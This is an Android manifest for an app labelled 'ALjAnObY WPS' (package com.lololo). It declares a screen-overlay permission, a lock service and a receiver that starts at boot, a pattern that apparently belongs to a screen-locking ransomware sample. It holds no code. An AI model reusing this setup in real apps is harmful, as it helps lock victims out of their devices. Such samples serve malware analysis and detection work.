<?xml version="1.0" encoding="utf-8" ?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="1" android:versionName="1.0" package="com.lololo" platformBuildVersionCode="23" platformBuildVersionName="6.0-2704002">
	<uses-sdk android:minSdkVersion="8" android:targetSdkVersion="21" />
	<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
	<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
	<uses-permission android:name="android.permission.SET_WALLPAPER" />
	<application android:icon="@drawable/ic_launcher" android:label="ALjAnObY WPS">
		<activity android:label="ALjAnObY WPS" android:name="com.lololo.MainActivity">
			<intent-filter>
				<action android:name="android.intent.action.MAIN" />
				<category android:name="android.intent.category.LAUNCHER" />
			</intent-filter>
		</activity>
		<service android:enabled="true" android:name="com.lololo.LockService" />
		<receiver android:enabled="true" android:name="com.lololo.BootReceiver" android:permission="android.permission.RECEIVE_BOOT_COMPLETED">
			<intent-filter>
				<action android:name="android.intent.action.BOOT_COMPLETED" />
				<category android:name="android.intent.category.DEFAULT" />
			</intent-filter>
		</receiver>
	</application>
</manifest>
